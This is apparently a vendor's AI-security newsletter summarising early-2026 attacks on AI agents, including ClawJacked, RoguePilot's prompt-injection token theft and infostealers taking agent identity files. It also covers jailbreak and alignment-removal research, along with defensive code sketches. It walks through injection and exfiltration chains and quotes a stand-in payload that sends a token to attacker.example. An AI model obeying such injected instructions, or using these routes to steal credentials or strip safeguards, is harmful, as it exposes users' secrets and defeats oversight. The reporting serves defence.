February 19 – March 5, 2026

Your regular briefing on AI security threats, vulnerabilities, and defences from Darkhunt AI

TL;DR

  • Agent infrastructure is under active, multi-vector attack: ClawJacked lets any website hijack a local AI agent via WebSocket brute-force; RoguePilot chains prompt injection through GitHub issues to exfiltrate Copilot tokens; infostealers are now harvesting agent identity files as routinely as browser credentials

  • Safety alignment is structurally fragile: Microsoft's GRP-Obliteration removes alignment from 15 open-weight models with a single training prompt; Nature Communications publishes evidence that large reasoning models autonomously jailbreak other models at 97% success

  • CrowdStrike reports 89% YoY increase in AI-enabled adversary operations, with prompt injection exploited at 90+ organisations and average eCrime breakout times dropping to 29 minutes

  • A new generation of adaptive defences is emerging: AgentSentry introduces temporal causal diagnostics for multi-turn prompt injection; MCPShield adds a security cognition layer for MCP agents; SkillFortify brings formal verification to agent skill supply chains

  • Market validation accelerates: Proofpoint acquires Acuvity for AI agent security; OpenAI rates GPT-5.3-Codex "High" for cyber capability and launches $10M defender access program


Top Stories


ClawJacked and RoguePilot: Agent Infrastructure Is the New Attack Surface

Two named vulnerabilities published within days of each other demonstrate that AI agent infrastructure has become a first-class target for exploitation -- not through model-level attacks, but through the systems agents depend on.

ClawJacked (disclosed February 28 by Oasis Security) exploits the fact that browser cross-origin policies do not block WebSocket connections to localhost. Malicious JavaScript on any website can initiate a WebSocket connection to a locally running OpenClaw gateway, brute-force the password with no rate-limiting, register as a trusted device without user notification, and achieve full agent compromise. From a browser tab, an attacker can instruct the agent to search Slack history, read private messages, exfiltrate files, or execute shell commands on paired nodes. OpenClaw was patched in version 2026.2.25 within 24 hours, but the underlying attack pattern -- browser-to-localhost WebSocket hijacking -- applies to any agent with a local gateway.

RoguePilot (disclosed February 24 by Orca Security) is a full prompt injection exploit chain against GitHub Copilot in Codespaces. Hidden instructions in HTML comments within a GitHub issue silently take over Copilot, which then checks out a crafted pull request containing a symlink to the secrets file, creates a JSON file with a $schema pointing to an attacker-controlled server, and exploits VS Code's default schema auto-download to exfiltrate the GITHUB_TOKEN via HTTP GET. The chain -- passive prompt injection, symlink traversal, JSON schema side-channel -- is precisely the kind of multi-step exploit that single-layer defences miss entirely.
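The exfiltration step is auditable: any workspace JSON file whose $schema points off-machine will trigger a network fetch carrying whatever the attacker embedded in the URL. A minimal detection sketch, with an illustrative allowlist (the function name and policy are ours, not a VS Code feature):

```python
# Sketch: flag workspace JSON whose $schema would trigger a remote fetch,
# closing the schema auto-download side channel RoguePilot abuses.
import json
from urllib.parse import urlparse

def remote_schema_refs(json_text: str) -> list[str]:
    """Return any $schema URLs that would cause a network request."""
    doc = json.loads(json_text)
    refs = []
    def walk(node):
        if isinstance(node, dict):
            schema = node.get("$schema")
            if isinstance(schema, str):
                host = urlparse(schema).netloc
                if host and host not in {"json.schemastore.org"}:  # example allowlist
                    refs.append(schema)
            for v in node.values():
                walk(v)
        elif isinstance(node, list):
            for v in node:
                walk(v)
    walk(doc)
    return refs
```

Run against a RoguePilot-style payload such as `{"$schema": "https://attacker.example/s.json?t=TOKEN"}`, the scan surfaces the attacker-controlled URL before VS Code ever fetches it.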

Bruce Schneier and other researchers have coined the term "promptware" for this class of attack: malware-like LLM inputs that exploit AI applications across the full attack lifecycle, from initial access through exfiltration.

Why it matters: Neither ClawJacked nor RoguePilot attacks the model. They attack the agent's infrastructure -- WebSocket gateways, development environments, file systems, and IDE settings. This is the shift security teams need to internalise: as AI agents gain real-world capabilities through tool access and system integration, the attack surface expands to include everything the agent can reach. Compromising the model is optional when you can compromise its environment.

Darkhunt perspective: These attacks validate a pattern we have been tracking: the most dangerous agent vulnerabilities are not in the LLM but in the trust boundaries between agents and their environments. ClawJacked exploits implicit trust between browsers and localhost. RoguePilot exploits implicit trust between Copilot and its workspace. Defending agents requires probing these boundaries systematically -- understanding not just what the agent can do, but what everything connected to it can do to it.


Safety Alignment Is a Speed Bump, Not a Wall

Two independent research efforts published this period reach the same conclusion through different methods: the safety alignment protecting current AI models is far more fragile than the industry assumes.

GRP-Obliteration (Microsoft Research, led by CTO Mark Russinovich) demonstrates that GRPO -- the same reinforcement learning technique used to make models more helpful -- can remove safety alignment from 15 open-weight models using a single, mild training prompt ("Create a fake news article that could lead to panic or chaos"). The result: 81% unalignment across all 44 SorryBench safety categories, compared to 69% for Abliteration and 58% for TwinBreak. Model utility is preserved within a few per cent. The technique also transfers to diffusion models. Microsoft's companion blog post makes the practical recommendation explicit: alignment alone is insufficient; organisations must deploy independent runtime guardrails that cannot be removed by fine-tuning.
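The recommendation has a simple structural form: the guardrail must live outside the model's weights, so no amount of fine-tuning can touch it. A minimal sketch, with a stand-in keyword classifier (production systems would use a dedicated moderation model; `simple_policy` and `guarded` are our illustrative names):

```python
# Sketch: a runtime guardrail that wraps the model from outside, so
# fine-tuning attacks like GRP-Obliteration cannot remove it.
# The keyword check is a stand-in for a real moderation classifier.
from typing import Callable

BLOCKLIST = ("fake news article", "panic or chaos")  # illustrative policy

def simple_policy(text: str) -> bool:
    """Return True if the text violates policy (stand-in classifier)."""
    lowered = text.lower()
    return any(term in lowered for term in BLOCKLIST)

def guarded(model: Callable[[str], str],
            violates: Callable[[str], bool] = simple_policy) -> Callable[[str], str]:
    """Wrap a model so both prompt and completion pass the external check."""
    def call(prompt: str) -> str:
        if violates(prompt):
            return "[blocked by runtime guardrail]"
        completion = model(prompt)
        if violates(completion):
            return "[blocked by runtime guardrail]"
        return completion
    return call
```

The point is the architecture, not the classifier: even a fully unaligned model behind this wrapper cannot return a violating completion, because the check runs in a process the attacker's training prompt never sees.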

Large Reasoning Models as Autonomous Jailbreak Agents (published in Nature Communications) shows that four LRMs -- DeepSeek-R1, Gemini 2.5 Flash, Grok 3 Mini, and Qwen3 235B -- can autonomously jailbreak nine target models with a 97.14% success rate in multi-turn conversations, with no human supervision beyond the initial instruction. The paper documents "alignment regression": as models become more capable at reasoning, they simultaneously become more capable at attacking other models' safety mechanisms. Non-experts can now jailbreak any model by simply asking an LRM to do it for them.

Why it matters: GRP-Obliteration means any agent using open-weight models has a safety layer that can be trivially removed. Alignment regression means the arms race between model capability and model safety is structurally imbalanced: every improvement in reasoning also increases the ability to circumvent defences. Together, these findings make the case that model-level safety is necessary but cannot be the primary line of defence.

Darkhunt perspective: These are not theoretical attacks. They describe the operational environment that any AI security system must defend. If a single unlabeled prompt can strip alignment from an open-weight model, and a reasoning model can autonomously jailbreak a closed model at 97% success, then defence must operate at a layer the attacker cannot reach through the model itself. Runtime monitoring, behavioural analysis, and closed-loop response -- systems that observe what agents actually do, not what they were trained to refuse -- become the essential defensive layer.


CrowdStrike Confirms: AI-Accelerated Threats Are Mainstream

The CrowdStrike 2026 Global Threat Report puts authoritative numbers behind what the research community has been warning about. AI-enabled adversary operations increased 89% year-over-year. Adversaries injected malicious prompts into 90+ organisations to generate commands for credential theft and cryptocurrency theft. Attackers published malicious AI servers impersonating trusted services to intercept sensitive data. Average eCrime breakout time dropped to 29 minutes, with the fastest observed at 27 seconds. And 82% of detections involved no malware at all -- attackers are using valid credentials, approved SaaS integrations, and trusted identity flows.

Why it matters: This is no longer a research problem. Prompt injection against GenAI tools is happening at scale, in production, across dozens of organisations. The 82% malware-free statistic is particularly significant for AI agent security: agents operate through identities and trust relationships, which are exactly the attack surface that adversaries exploit.


Attack Vectors & Vulnerabilities


Agent Identity Theft Arrives

Hudson Rock identified a Vidar infostealer variant that successfully exfiltrated OpenClaw configuration files from a victim's system -- the first documented case of commodity malware targeting AI agent credentials. Three files were stolen: openclaw.json (gateway authentication tokens), device.json (cryptographic keys), and soul.md (the agent's behavioural identity file). With these, an attacker can remotely impersonate the agent, access everything it has permissions for, and even modify its behaviour using the stolen identity file. Hudson Rock predicts dedicated agent-targeting malware modules will follow, mirroring the evolution of browser and messaging-app credential stealers. (Source)
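The near-term mitigation is to treat agent identity files like SSH private keys: lock down permissions and detect tampering. A minimal audit sketch, using the file names from the Hudson Rock report (the baseline-hash approach is our illustration, not an OpenClaw feature):

```python
# Sketch: audit agent identity files for loose permissions and tampering,
# the same hygiene sshd enforces for private keys.
import hashlib
import os
import stat

IDENTITY_FILES = ("openclaw.json", "device.json", "soul.md")

def too_permissive(path: str) -> bool:
    """True if group or other users can read the file."""
    mode = os.stat(path).st_mode
    return bool(mode & (stat.S_IRGRP | stat.S_IROTH))

def fingerprint(path: str) -> str:
    with open(path, "rb") as f:
        return hashlib.sha256(f.read()).hexdigest()

def audit(directory: str, baseline: dict[str, str]) -> list[str]:
    """Report identity files that are readable by others or changed since baseline."""
    findings = []
    for name in IDENTITY_FILES:
        path = os.path.join(directory, name)
        if not os.path.exists(path):
            continue
        if too_permissive(path):
            findings.append(f"{name}: readable by other users")
        if baseline.get(name) and fingerprint(path) != baseline[name]:
            findings.append(f"{name}: contents changed since baseline")
    return findings
```

Permission checks will not stop an infostealer running as the victim user, but tamper detection on soul.md catches the subtler attack Hudson Rock describes: modifying the agent's behaviour via its stolen identity file.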


Viral Agent Loops: Self-Propagating Worms Without Code Exploits

A systematisation paper from Jiang et al. introduces the "Viral Agent Loop" -- a scenario where a compromised agent generates outputs that, when consumed by other agents, propagate the compromise further. No code-level vulnerability is required. The paper also formalises "Stochastic Dependency Resolution": unlike traditional software, where dependencies are declared at build time, agent dependencies are resolved dynamically and non-deterministically at inference time, creating an attack surface that conventional supply chain security cannot audit. The authors propose a Zero-Trust Runtime Architecture as the appropriate defensive model. (Paper: arXiv:2602.19555)
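The zero-trust idea can be made concrete with taint propagation: once any untrusted input enters a message's lineage, everything derived from it stays tainted, which is exactly the property a Viral Agent Loop exploits when agents consume each other's outputs unchecked. A toy sketch (the names and mechanism are ours, not the paper's):

```python
# Sketch: zero-trust inter-agent messaging via taint propagation.
# An agent's output inherits taint from every message it consumed.
from dataclasses import dataclass

@dataclass(frozen=True)
class AgentMessage:
    sender: str
    content: str
    tainted: bool  # True if any untrusted input is in this message's lineage

def derive(output: str, sender: str, inputs: list[AgentMessage]) -> AgentMessage:
    """Producing an output from tainted inputs yields a tainted output."""
    return AgentMessage(sender, output, any(m.tainted for m in inputs))

def accept(msg: AgentMessage, allow_tainted: bool = False) -> bool:
    """Zero-trust consumption: tainted messages need explicit opt-in."""
    return allow_tainted or not msg.tainted
```

The monotonicity is the point: a compromise picked up from a scraped web page stays visible however many agents relay the derived content, so the loop cannot propagate silently.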


AutoInject: RL-Generated Prompt Injections That Transfer Across Models

From Florian Tramer's lab at ETH Zurich, AutoInject uses reinforcement learning to train a 1.5B parameter model that generates universal, transferable adversarial suffixes for prompt injection. The generator successfully compromises GPT-5 Nano, Claude Sonnet 3.5, and Gemini 2.5 Flash on the AgentDojo benchmark, outperforming GCG, TAP, and random adaptive attacks. The key implication: scalable, automated prompt injection is now achievable with modest compute. (Paper: arXiv:2602.05746)


AgentLAB: 70% Attack Success Against Frontier Agents

The first benchmark for long-horizon attacks against LLM agents tests five attack types -- intent hijacking, tool chaining, task injection, objective drifting, and memory poisoning -- across 28 environments with 644 test cases. Even GPT-5.1 shows approximately 70% attack success rate. The critical finding: defenses designed for single-turn interactions do not transfer to long-horizon settings. Agents that resist a single malicious prompt remain highly vulnerable to attacks that unfold gradually across multiple turns. (Paper: arXiv:2602.16901)
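The finding that single-turn defences do not transfer suggests monitoring trajectories rather than turns. As a toy illustration of objective-drift detection (our sketch, far cruder than the attacks AgentLAB actually tests; the similarity measure and threshold are illustrative):

```python
# Sketch: a toy objective-drift monitor for long-horizon agent sessions.
# Score each proposed action against the original task and flag turns
# whose action shares almost nothing with the stated objective.
def token_overlap(a: str, b: str) -> float:
    """Jaccard similarity over lowercase word sets."""
    sa, sb = set(a.lower().split()), set(b.lower().split())
    return len(sa & sb) / len(sa | sb) if sa | sb else 1.0

def drift_alerts(objective: str, actions: list[str],
                 threshold: float = 0.1) -> list[int]:
    """Indices of turns whose action has drifted from the objective."""
    return [i for i, act in enumerate(actions)
            if token_overlap(objective, act) < threshold]
```

A real attack drifts gradually, so each adjacent step looks plausible; the defensive insight from the benchmark is that the comparison must always anchor back to the original objective, not to the previous turn.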

Industrial-Scale Model Distillation Campaign

Anthropic disclosed that DeepSeek, Moonshot AI, and MiniMax used 24,000 fraudulent accounts to extract 16 million exchanges from Claude, specifically targeting agentic reasoning, tool use, and coding capabilities. MiniMax alone drove 13 million exchanges. The attackers used "hydra cluster" proxy architectures to evade detection. The targeted capabilities are exactly those that power autonomous agent functionality. (Source)


Defensive Developments


AgentSentry: Temporal Causal Diagnostics for Multi-Turn Attacks

The first inference-time defense specifically designed for multi-turn indirect prompt injection. AgentSentry models attacks as temporal causal takeovers and uses counterfactual re-execution at tool-return boundaries to detect where an attack seizes control. Context purification then removes malicious deviations while preserving legitimate tool outputs, enabling safe continuation without full restart. On the AgentDojo benchmark, it achieves 74.55% utility under attack -- a 20-33 percentage point improvement over the strongest baselines. The approach is significant because it reasons about attack causality rather than pattern-matching against known attacks. (Paper: arXiv:2602.22724)
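The counterfactual idea can be sketched in a few lines: re-plan with a suspect context item removed and treat a changed plan as evidence that the item, not the user, is steering the agent. This is our simplified reading of the approach, not the paper's implementation:

```python
# Sketch: counterfactual re-execution over agent context. An item whose
# removal changes the agent's plan is causally steering the agent.
from typing import Callable

def causal_suspects(plan_fn: Callable[[list[str]], str],
                    context: list[str]) -> list[int]:
    """Indices of context items whose removal changes the resulting plan."""
    baseline = plan_fn(context)
    suspects = []
    for i in range(len(context)):
        counterfactual = context[:i] + context[i + 1:]
        if plan_fn(counterfactual) != baseline:
            suspects.append(i)
    return suspects
```

The appeal over pattern matching is that nothing here knows what an injection looks like: an innocuous-seeming tool return is flagged purely because the agent behaves differently without it, which is what "temporal causal takeover" captures.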


MCPShield: Adaptive Trust for the MCP Ecosystem

A plug-in security cognition layer that addresses implicit trust in MCP agent-tool interactions through three phases: pre-invocation probing (metadata analysis before execution), runtime monitoring (tracking execution patterns and data flows), and post-invocation reflection (updating trust assessments based on observed behavior). Tested against six novel MCP attack scenarios across six LLM platforms with low false-positive rates. The adaptive trust calibration improves over repeated interactions -- the system learns. (Paper: arXiv:2602.14281)
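The post-invocation reflection phase can be pictured as a running trust score per tool that each observation nudges up or down. A minimal sketch in that spirit (the exponential-moving-average update and thresholds are our illustration; MCPShield's actual calibration may differ):

```python
# Sketch: adaptive per-tool trust calibration. Each observed invocation
# blends into a running score; tools that misbehave lose invocation rights.
class ToolTrust:
    def __init__(self, initial: float = 0.5, alpha: float = 0.3,
                 threshold: float = 0.3):
        self.scores: dict[str, float] = {}
        self.initial, self.alpha, self.threshold = initial, alpha, threshold

    def observe(self, tool: str, benign: bool) -> float:
        """Exponential moving average of benign/malicious observations."""
        prev = self.scores.get(tool, self.initial)
        score = (1 - self.alpha) * prev + self.alpha * (1.0 if benign else 0.0)
        self.scores[tool] = score
        return score

    def allowed(self, tool: str) -> bool:
        return self.scores.get(tool, self.initial) >= self.threshold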


SkillFortify: Formal Verification for Agent Supply Chains

Motivated by the ClawHavoc campaign (1,200+ malicious skills on ClawHub), SkillFortify introduces formal methods -- Dolev-Yao threat modeling, static analysis, capability-based sandboxing, and SAT-based dependency resolution -- to agent skill security. Results on a 540-skill benchmark: 96.95% F1, 100% precision, 0% false positives, with 1,000-node dependency graphs resolved in under 100ms. Where VirusTotal scanning catches binary payloads but misses prompt injection, SkillFortify provides mathematical guarantees about detection accuracy. (Paper: arXiv:2603.00195)


Protocol-Level Threat Modeling Across MCP, A2A, Agora, and ANP

The first comparative security threat model across four AI agent communication protocols identifies 12 protocol-level risks across creation, operation, and update lifecycle phases. A detailed MCP case study demonstrates practical exploitation of design-induced risk surfaces. As agent-to-agent communication becomes standard, the protocols connecting them become critical attack surfaces that require their own security analysis. (Paper: arXiv:2602.11327)


The Darkhunt Take

This was the period where AI agent security stopped being about individual vulnerabilities and became about systemic risk.

Look at the attack surface that emerged in just two weeks. ClawJacked: a website hijacks your agent through a WebSocket. RoguePilot: a GitHub issue steals your tokens through your coding assistant. Infostealers: commodity malware harvests your agent's identity files alongside your browser passwords. These are not exotic attacks requiring nation-state resources. They are the kind of opportunistic exploitation that scales to every developer running a local agent -- and there are hundreds of thousands of them.

Now layer on the research. GRP-Obliteration proves that safety alignment in open-weight models can be removed with a single prompt. Alignment regression shows that the better a reasoning model gets, the better it gets at jailbreaking other models. AgentLAB demonstrates that 70% of attacks succeed against frontier agents when they unfold over multiple turns. AutoInject automates prompt injection generation with a 1.5B parameter model. The attacker's toolkit is maturing faster than the defender's.

What is most striking, though, is not any single finding. It is the convergence. The agent infrastructure layer (ClawJacked, RoguePilot, infostealers) is under attack from below. The model safety layer (GRP-Obliteration, alignment regression) is being proven inadequate from within. The protocol layer (MCP, A2A) is being systematically threat-modeled. And the supply chain layer (Viral Agent Loops, stochastic dependencies) introduces threats that do not exist in traditional software at all.

The defensive responses emerging this period are encouraging precisely because they match the threat in sophistication. AgentSentry does not pattern-match -- it reasons counterfactually about what caused an agent's behavior to deviate. MCPShield does not use static allowlists -- it builds adaptive trust models that improve with each interaction. SkillFortify does not scan binaries -- it applies formal verification to supply chain integrity. These are defenses that think, not defenses that filter.

The throughline is clear: static, reactive security cannot keep pace with an attack surface that is dynamic by design. AI agents resolve dependencies at runtime, consume untrusted context as control flow, and operate across trust boundaries that did not exist a year ago. Defending them requires systems that operate at the same level of sophistication -- probing attack paths adaptively, reasoning about intent, and hardening defenses in a continuous loop. The question is no longer whether AI security needs to be autonomous. It is whether it can become autonomous fast enough.

Darkhunt AI builds autonomous systems that probe, reason, and harden AI defenses. Learn more